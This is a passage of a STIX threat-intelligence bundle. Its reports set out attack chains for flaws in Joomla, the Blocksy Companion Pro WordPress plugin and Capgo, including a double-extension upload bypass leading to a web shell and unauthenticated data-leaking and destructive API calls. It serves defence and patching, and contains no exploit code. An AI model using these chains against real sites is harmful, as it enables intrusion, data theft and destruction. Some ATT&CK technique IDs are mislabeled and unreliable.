      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://www.cve.org/CVERecord?id=CVE-2026-48956",
      "pattern": "[url:value = 'https://www.cve.org/CVERecord?id=CVE-2026-48956']",
      "pattern_type": "stix",
      "valid_from": "2026-07-08T14:15:17Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--fa5fbf44-a20a-56c6-b75d-2320dc04ff4c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--280f8811-2436-5330-9b16-575528fdcf46",
      "target_ref": "indicator--1e4abd2c-af24-554c-9841-bd0e6fad3773"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--a63f3fce-2717-58ec-8982-a5fbb95b8d2f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://www.cve.org/CVERecord?id=CVE-2026-48957",
      "pattern": "[url:value = 'https://www.cve.org/CVERecord?id=CVE-2026-48957']",
      "pattern_type": "stix",
      "valid_from": "2026-07-08T14:15:17Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--35f7c1da-118c-5d19-bbfb-89c2fbe2780f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--280f8811-2436-5330-9b16-575528fdcf46",
      "target_ref": "indicator--a63f3fce-2717-58ec-8982-a5fbb95b8d2f"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--e8c509db-13c3-5cbc-a668-1366339507d7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://www.cve.org/CVERecord?id=CVE-2026-48958",
      "pattern": "[url:value = 'https://www.cve.org/CVERecord?id=CVE-2026-48958']",
      "pattern_type": "stix",
      "valid_from": "2026-07-08T14:15:17Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--5d135045-a91d-5edc-9aee-a45343eef405",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--280f8811-2436-5330-9b16-575528fdcf46",
      "target_ref": "indicator--e8c509db-13c3-5cbc-a668-1366339507d7"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--24e6f46a-7291-528a-accb-32cad1d630a9",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--280f8811-2436-5330-9b16-575528fdcf46",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data from Local System",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1005",
          "url": "https://attack.mitre.org/techniques/T1005"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ebb7e136-a1a0-5092-baab-fd3cb0db4bbb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--280f8811-2436-5330-9b16-575528fdcf46",
      "target_ref": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--67193ec2-dec7-586e-a385-cc0f1baa8526",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data Destruction",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1485",
          "url": "https://attack.mitre.org/techniques/T1485"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--3a5681d4-092b-5b1a-8f05-b63d7e4a2dd6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--280f8811-2436-5330-9b16-575528fdcf46",
      "target_ref": "attack-pattern--67193ec2-dec7-586e-a385-cc0f1baa8526"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Impair Defenses",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1562",
          "url": "https://attack.mitre.org/techniques/T1562"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--0f8fa9cc-03aa-565f-8870-a550ab29b7e7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--280f8811-2436-5330-9b16-575528fdcf46",
      "target_ref": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--280f8811-2436-5330-9b16-575528fdcf46",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Multiple Vulnerabilities Discovered in Joomla! CMS",
      "description": "## Overview\n\nOn July 8, 2026, the French National Cybersecurity Agency (ANSSI) CERT-FR issued an advisory detailing multiple vulnerabilities impacting the Joomla! Content Management System. These flaws affect Joomla! 6.x versions earlier than 6.1.2 and Joomla! 5.x versions earlier than 5.4.7. The vulnerabilities encompass various Cross-Site Scripting (XSS) issues and several instances of incorrect access control within components like `com-media-webservice-endpoints`, `com-contact-vcf-download`, `com-workflow`, `com-modules`, `com-privacy-webservice-endpoints`, and `com-fields-webservice-endpoints`. Successful exploitation could lead to breaches of data confidentiality, compromises of data integrity, remote indirect code injection, and a general bypass of security policies, potentially granting unauthorized access or control over the affected Joomla! instance and its data. Organizations running vulnerable versions of Joomla! are urged to apply patches immediately to mitigate these risks.\n\n## Attack Chain\n\n1. An unauthenticated or low-privileged attacker identifies a vulnerable Joomla! instance.\n2. The attacker crafts a malicious request targeting specific Joomla! components, such as `com-templates` or `com-installer`, containing XSS payloads.\n3. The crafted request leverages the XSS vulnerability (e.g., CVE-2026-48949, CVE-2026-48950, CVE-2026-48951, CVE-2026-48952, CVE-2026-48953, CVE-2026-48954) to inject malicious client-side script into web pages viewed by other users, including administrators.\n4. Alternatively, the attacker exploits incorrect access control vulnerabilities (e.g., CVE-2026-48947, CVE-2026-48948, CVE-2026-48955, CVE-2026-48956, CVE-2026-48957, CVE-2026-48958) in various webservice endpoints or components.\n5. Through XSS, the attacker compromises legitimate user sessions, potentially stealing cookies, session tokens, or performing actions on behalf of the victim.\n6. Through incorrect access control, the attacker gains unauthorized access to sensitive data, modifies system configurations, or manipulates content, leading to data confidentiality and integrity breaches.\n\n## Impact\n\nThe identified vulnerabilities could result in significant damage to affected organizations. Successful exploitation of the Cross-Site Scripting (XSS) flaws can lead to session hijacking, defacement, or redirection, potentially exposing administrative credentials or sensitive user data. The incorrect access control vulnerabilities could allow unauthorized users to view, modify, or delete critical information, leading to data breaches or integrity compromises. While no specific victim count or targeted sectors were detailed in the advisory, any organization utilizing vulnerable Joomla! versions is at risk of unauthorized data access, website defacement, and potential regulatory non-compliance due to data exposure.\n\n## Recommendation\n\n* Prioritize patching all affected Joomla! installations to versions 6.1.2 or later, or 5.4.7 or later, as recommended in the CERTFR-2026-AVI-0847 advisory.\n* Review web server access logs for unusual requests containing script-like characters in parameters, especially for URLs related to `com-templates`, `com-installer`, or other components mentioned in the Joomla! security bulletins.\n* Implement a robust Web Application Firewall (WAF) to detect and block malicious requests attempting to exploit CVE-2026-48949, CVE-2026-48950, CVE-2026-48951, CVE-2026-48952, CVE-2026-48953, and CVE-2026-48954.\n* Regularly back up Joomla! databases and file systems to ensure data integrity can be restored in case of a successful exploit leading to data corruption or loss.\n",
      "published": "2026-07-08T14:15:17Z",
      "labels": [
        "web-vulnerability",
        "xss",
        "access-control",
        "cms",
        "joomla"
      ],
      "object_refs": [
        "indicator--9b178f23-c7ff-592a-a854-dfc9099876e7",
        "indicator--5d3fafe1-4acb-5f4f-bc4d-78f49a0b57e5",
        "indicator--09cf93b3-783f-588c-83c9-b69f4c93ad5d",
        "indicator--d14271f3-23ae-5945-bb09-de922b01b52f",
        "indicator--e93d1caf-7f82-5e44-a6e8-43b5a67387ea",
        "indicator--1947dd9f-9287-5b41-8a22-93e56c5c3372",
        "indicator--f96fada8-6e84-5488-ad93-61865a85fba3",
        "indicator--475dcbfe-8e0e-5148-8b64-4c0305cf71d5",
        "indicator--d396f039-82fe-5f7c-9056-fad983bed662",
        "indicator--717081e5-b821-5308-992d-480d352a851e",
        "indicator--cfbcdf73-951b-57d6-b125-0a7a36cb0e13",
        "indicator--3c88f8ac-7548-538a-89da-c8a44af44001",
        "indicator--4a899f76-2f0d-56e5-935a-b4cca15a1461",
        "indicator--bae8a26a-0ee4-5f68-b3e6-6a91266eb66d",
        "indicator--6f5dcf7b-3085-503e-b5c6-951596a92381",
        "indicator--92a499af-75ea-54c9-b283-d1f34d93dc6a",
        "indicator--f716d6d7-d937-5271-bc21-8c95fd00fe79",
        "indicator--9c64370d-a46a-5473-9872-b5151956567a",
        "indicator--b3610ad1-5d5f-5985-8a26-19c99ad4d55c",
        "indicator--31e6c983-a8b6-5998-a9c7-b8fa9dc75c69",
        "indicator--de71f0b5-b89d-5587-9f0d-3518d85828c7",
        "indicator--1e4abd2c-af24-554c-9841-bd0e6fad3773",
        "indicator--a63f3fce-2717-58ec-8982-a5fbb95b8d2f",
        "indicator--e8c509db-13c3-5cbc-a668-1366339507d7",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04",
        "attack-pattern--67193ec2-dec7-586e-a385-cc0f1baa8526",
        "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.cert.ssi.gouv.fr/avis/CERTFR-2026-AVI-0847/"
        },
        {
          "source_name": "reference",
          "url": "https://developer.joomla.org/security-centre/1055-20260701-core-incorrect-access-control-in-com-media-webservice-endpoints.html"
        },
        {
          "source_name": "reference",
          "url": "https://developer.joomla.org/security-centre/1056-20260702-core-incorrect-access-control-in-com-contact-vcf-download.html"
        },
        {
          "source_name": "reference",
          "url": "https://developer.joomla.org/security-centre/1057-20260703-core-xss-in-mfa-method-management.html"
        },
        {
          "source_name": "reference",
          "url": "https://developer.joomla.org/security-centre/1058-20260704-core-xss-in-com-templates.html"
        },
        {
          "source_name": "reference",
          "url": "https://developer.joomla.org/security-centre/1059-20260705-core-xss-in-various-modalreturn-layouts.html"
        },
        {
          "source_name": "reference",
          "url": "https://developer.joomla.org/security-centre/1060-20260706-core-xss-in-com-installer.html"
        },
        {
          "source_name": "reference",
          "url": "https://developer.joomla.org/security-centre/1061-20260707-core-xss-in-the-generic-image-output-layout.html"
        },
        {
          "source_name": "reference",
          "url": "https://developer.joomla.org/security-centre/1062-20260708-core-xss-through-language-overrides.html"
        },
        {
          "source_name": "reference",
          "url": "https://developer.joomla.org/security-centre/1063-20260709-core-incorrect-access-control-in-com-workflow.html"
        },
        {
          "source_name": "reference",
          "url": "https://developer.joomla.org/security-centre/1064-20260710-core-incorrect-access-control-in-com-modules.html"
        },
        {
          "source_name": "reference",
          "url": "https://developer.joomla.org/security-centre/1065-20260711-core-incorrect-access-control-in-com-privacy-webservice-endpoints.html"
        },
        {
          "source_name": "reference",
          "url": "https://developer.joomla.org/security-centre/1066-20260712-core-incorrect-access-control-in-com-fields-webservice-endpoints.html"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-48947"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-48948"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-48949"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-48950"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-48951"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-48952"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-48953"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-48954"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-48955"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-48956"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-48957"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-48958"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--bd875342-0c00-5eaf-9fc6-290ea891ae27",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Drive-by Compromise",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1609",
          "url": "https://attack.mitre.org/techniques/T1609"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--04e62d48-5fb6-53a0-8de1-3a0e4790fcd9",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--7ed577b7-34dc-507f-9ad1-47583bf75427",
      "target_ref": "attack-pattern--bd875342-0c00-5eaf-9fc6-290ea891ae27"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--4aeb86b2-b753-57d0-afd2-a764bc1a6ed8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--7ed577b7-34dc-507f-9ad1-47583bf75427",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--bea84da1-fe85-5fa2-a60d-90c3c86b9473",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Server Software Component",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1505",
          "url": "https://attack.mitre.org/techniques/T1505"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--786a00fb-a6fa-5a25-b662-fcd1b9ed2bed",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--7ed577b7-34dc-507f-9ad1-47583bf75427",
      "target_ref": "attack-pattern--bea84da1-fe85-5fa2-a60d-90c3c86b9473"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--7ed577b7-34dc-507f-9ad1-47583bf75427",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Critical RCE Vulnerability in Blocksy Companion Pro WordPress Plugin (CVE-2026-58480)",
      "description": "## Overview\n\nA critical unauthenticated arbitrary file upload vulnerability, tracked as CVE-2026-58480, has been identified in the Blocksy Companion Pro plugin for WordPress, affecting all versions prior to 2.1.47. This flaw enables remote attackers to achieve arbitrary code execution on vulnerable WordPress installations. The vulnerability resides within the `save_attachments` function, exposed through the Advanced Reviews feature, where inadequate extension validation allows attackers to upload executable files. Specifically, a flawed `strpos()` substring check in the Custom Fonts extension's validation mechanism can be bypassed by using double-extension filenames (e.g., `shell.woff2.php`). This bypass tricks the web server into executing the uploaded file as PHP, giving attackers full control over the compromised website. This vulnerability presents a significant risk to affected organizations, allowing for website defacement, data theft, or further network compromise.\n\n## Attack Chain\n\n1. An unauthenticated attacker identifies a WordPress site running the Blocksy Companion Pro plugin version prior to 2.1.47.\n2. The attacker crafts a malicious file, such as `shell.woff2.php`, containing PHP code.\n3. The attacker sends an HTTP POST request to the `save_attachments` function, which is exposed via the Advanced Reviews feature, attempting to upload the malicious file. This likely targets the `admin-ajax.php` endpoint.\n4. The plugin's validation process, specifically the `strpos()` check in the Custom Fonts extension, mistakenly passes the filename `shell.woff2.php` because it contains the `.woff2` substring.\n5. The `save_attachments` function proceeds with the upload, placing the file on the web server.\n6. The web server, recognizing the `.php` extension, attempts to execute the uploaded file as a PHP script when accessed, leading to remote code execution.\n7. The attacker gains arbitrary code execution, typically establishing a web shell for persistent access and further compromise.\n\n## Impact\n\nThe successful exploitation of CVE-2026-58480 leads to full remote code execution on the compromised WordPress server. This allows attackers to deface websites, inject malicious content, exfiltrate sensitive data (e.g., customer information, intellectual property), establish persistent access via web shells, and potentially pivot to other systems within the network. For businesses relying on WordPress for e-commerce, content delivery, or lead generation, this can result in significant financial losses, reputational damage, and regulatory penalties. The high CVSS score of 9.8 reflects the critical nature of this unauthenticated RCE.\n\n## Recommendation\n\n* Immediately update the Blocksy Companion Pro plugin to version 2.1.47 or later to patch CVE-2026-58480.\n* Deploy the Sigma rule \"Detects CVE-2026-58480 Exploitation - Blocksy Companion Pro File Upload Bypass\" to your SIEM to detect attempts to exploit this vulnerability.\n* Enable detailed webserver logging (e.g., Apache access logs, Nginx access logs) to capture full HTTP request details, including URI stems, query strings, and request methods, which are crucial for the detection rule.\n* Regularly review web server access logs for suspicious file uploads to `/wp-content/uploads/` or other writable directories, especially for files with double extensions.\n",
      "published": "2026-07-08T14:19:33Z",
      "labels": [
        "wordpress",
        "plugin",
        "rce",
        "file-upload",
        "web"
      ],
      "object_refs": [
        "attack-pattern--bd875342-0c00-5eaf-9fc6-290ea891ae27",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--bea84da1-fe85-5fa2-a60d-90c3c86b9473"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-58480"
        }
      ],
      "confidence": 95
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--22910d15-4b35-58f7-b656-eb48a6db3931",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--a3224edc-c4cd-5d08-a7af-78192d2e6ae8",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--3866e24b-251c-5409-b390-26f7184d1897",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data from Information Repositories",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1530",
          "url": "https://attack.mitre.org/techniques/T1530"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--136a36c0-4dbc-5262-b64f-6205c397b763",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--a3224edc-c4cd-5d08-a7af-78192d2e6ae8",
      "target_ref": "attack-pattern--3866e24b-251c-5409-b390-26f7184d1897"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--a3224edc-c4cd-5d08-a7af-78192d2e6ae8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-56226 - Capgo Unauthenticated Data Exposure via Supabase PostgREST RPC",
      "description": "## Overview\n\nCVE-2026-56226 outlines a significant data exposure vulnerability in Capgo (Cap-go/capgo) versions preceding 12.128.2. This vulnerability stems from the application's exposure of the Supabase PostgREST RPC function `public.get_orgs_v6(userid uuid)`, which is configured as `SECURITY DEFINER` and granted to the `anon` role. This misconfiguration permits unauthenticated access to the function. An attacker, leveraging a public publishable API key, can send a POST request to `/rest/v1/rpc/get_orgs_v6` with any user's UUID. The function then returns sensitive information associated with that user, including organization membership, roles, subscription/trial metadata, and `management_email`, which constitutes personally identifiable information (PII). This flaw allows for widespread unauthorized data retrieval without requiring prior authentication.\n\n## Attack Chain\n\n1. An attacker identifies a Capgo instance running a vulnerable version (prior to 12.128.2).\n2. The attacker obtains the Capgo application's publicly available API key, typically found in client-side code or network traffic.\n3. The attacker crafts a malicious HTTP POST request targeting the exposed Supabase PostgREST RPC endpoint: `/rest/v1/rpc/get_orgs_v6`.\n4. Within the request body, the attacker includes a JSON payload containing an arbitrary `userid` UUID belonging to a user within the Capgo system.\n5. The vulnerable Capgo application, due to the `anon` role grant and `SECURITY DEFINER` setting for `public.get_orgs_v6`, processes the unauthenticated request.\n6. The RPC function executes, querying the backend Supabase database using the attacker-supplied `userid` UUID.\n7. The database returns all associated user details to the Capgo application.\n8. The Capgo application then sends the sensitive data, including organization membership, roles, subscription/trial metadata, and `management_email`, back to the attacker in the API response.\n\n## Impact\n\nThe successful exploitation of CVE-2026-56226 leads to unauthorized retrieval of sensitive user data. Attackers can obtain organization membership details, assigned roles, subscription and trial status, and critical Personally Identifiable Information (PII) such as the `management_email` for any user whose UUID they can guess or enumerate. This direct access to user data without authentication poses a severe privacy risk and can be leveraged for further social engineering, targeted phishing, or identity theft. The scope of impact is potentially all users registered on a vulnerable Capgo instance.\n\n## Recommendation\n\n* Patch CVE-2026-56226 immediately by updating Capgo to version 12.128.2 or later.\n* Deploy the Sigma rule \"Detects CVE-2026-56226 Exploitation - Unauthenticated Capgo Data Retrieval\" to your SIEM to identify attempts to exploit this vulnerability.\n* Review webserver access logs for the specific `cs-uri-stem` `/rest/v1/rpc/get_orgs_v6` for successful POST requests (`sc-status: 200`) from untrusted IP addresses or sources indicating potential exploitation.\n",
      "published": "2026-07-08T14:20:36Z",
      "labels": [
        "vulnerability",
        "api-exploitation",
        "data-exfiltration",
        "webserver",
        "supabase"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--3866e24b-251c-5409-b390-26f7184d1897"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-56226"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation for Privilege Escalation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1068",
          "url": "https://attack.mitre.org/techniques/T1068"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--9a710b96-3edd-599f-bf89-694c40bdab16",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--a3c6753f-6254-5fcc-9452-8d5bbcc717fc",
      "target_ref": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--bcb7aac1-0720-51b7-a9c7-65d3bf929d34",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data Destruction",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1489",
          "url": "https://attack.mitre.org/techniques/T1489"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--59a23102-9736-5924-a11c-0c65d9f7f46b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--a3c6753f-6254-5fcc-9452-8d5bbcc717fc",
      "target_ref": "attack-pattern--bcb7aac1-0720-51b7-a9c7-65d3bf929d34"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--c4eac0b5-7f75-5208-a560-6d98b706ea49",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Inhibit System Recovery",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1490",
          "url": "https://attack.mitre.org/techniques/T1490"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--82228f02-5bd7-5201-95df-46fe1ea943c3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--a3c6753f-6254-5fcc-9452-8d5bbcc717fc",
      "target_ref": "attack-pattern--c4eac0b5-7f75-5208-a560-6d98b706ea49"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--a3c6753f-6254-5fcc-9452-8d5bbcc717fc",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-56246 - Capgo Broken Access Control in Organization Management API",
      "description": "## Overview\n\nA critical broken access control vulnerability (CVE-2026-56246) has been identified in Capgo versions prior to 12.128.2. This flaw exists within the organization management API, specifically concerning how scoped API keys (configured with `limited_to_orgs`) handle permissions. An attacker who gains access to an API key owned by a user who is an administrator in multiple organizations can leverage this vulnerability. The key, despite being explicitly restricted to a single organization, improperly inherits the full administrative privileges of its owner across all organizations where the owner is an admin. This bypasses the intended scope of the API key, enabling the attacker to perform unauthorized and destructive cross-organization actions, such as deleting entire organizations or removing members using endpoints like `DELETE /organization` and `DELETE /organization/members`. The root cause lies in the application's `rbac_check_permission_direct` logic, which evaluates the owner's global user privileges before enforcing the `limited_to_orgs` restriction. This allows for privilege escalation and significant unauthorized impact.\n\n## Attack Chain\n\n1. An attacker obtains a Capgo API key belonging to a user who holds administrative privileges across multiple Capgo organizations.\n2. The attacker configures or identifies an API key intended to have its operations explicitly restricted to a single, designated organization using the `limited_to_orgs` scope.\n3. The attacker crafts an API request to perform a destructive action, such as `DELETE /organization` or `DELETE /organization/members`, targeting a *different* organization for which the API key is *not* explicitly authorized.\n4. The Capgo application processes the API request, initiating an authorization check that includes a call to `rbac_check_permission_direct`.\n5. During this authorization process, the system incorrectly evaluates the full administrative permissions of the API key's owner-user across all their assigned organizations.\n6. The system fails to enforce the `limited_to_orgs` scope, neglecting the explicit restriction defined for the API key itself due to the flawed `rbac_check_permission_direct` logic.\n7. The destructive API call (e.g., unauthorized organization deletion, member removal) is successfully executed against the unintended target organization, leading to unauthorized data destruction or disruption.\n\n## Impact\n\nThe successful exploitation of CVE-2026-56246 can lead to severe consequences, including unauthorized data destruction, service disruption, and privilege escalation. An attacker can leverage an improperly scoped API key to delete entire Capgo organizations or remove critical members from them, even if the key was explicitly meant for a different scope. This can cause significant operational downtime, loss of data, and potentially compromise the integrity of multiple organizational structures within Capgo, affecting all users and data associated with the targeted organizations. The broad impact stems from the ability to affect multiple, supposedly isolated, organizations via a single compromised key.\n\n## Recommendation\n\n* Patch Capgo instances immediately to version 12.128.2 or later to address CVE-2026-56246.\n* Review and re-evaluate all existing Capgo API keys, especially those with `limited_to_orgs` scope, to ensure they adhere to the principle of least privilege and their permissions are correctly enforced post-patch.\n* Implement strict logging and monitoring for Capgo API key usage, specifically for destructive operations like `DELETE /organization` or `DELETE /organization/members`, to detect anomalous activity related to CVE-2026-56246.\n",
      "published": "2026-07-08T14:21:38Z",
      "labels": [
        "vulnerability",
        "privilege-escalation",
        "data-destruction",
        "impact",
        "cloud"
      ],
      "object_refs": [
        "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
        "attack-pattern--bcb7aac1-0720-51b7-a9c7-65d3bf929d34",
        "attack-pattern--c4eac0b5-7f75-5208-a560-6d98b706ea49"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-56246"
        }
      ],
      "confidence": 80
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--717fbd6b-6aa3-53ab-b854-4ae0cd857d0f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://github.com/Cap-go/capgo/security/advisories/GHSA-pw8p-5jg6-cxj3",
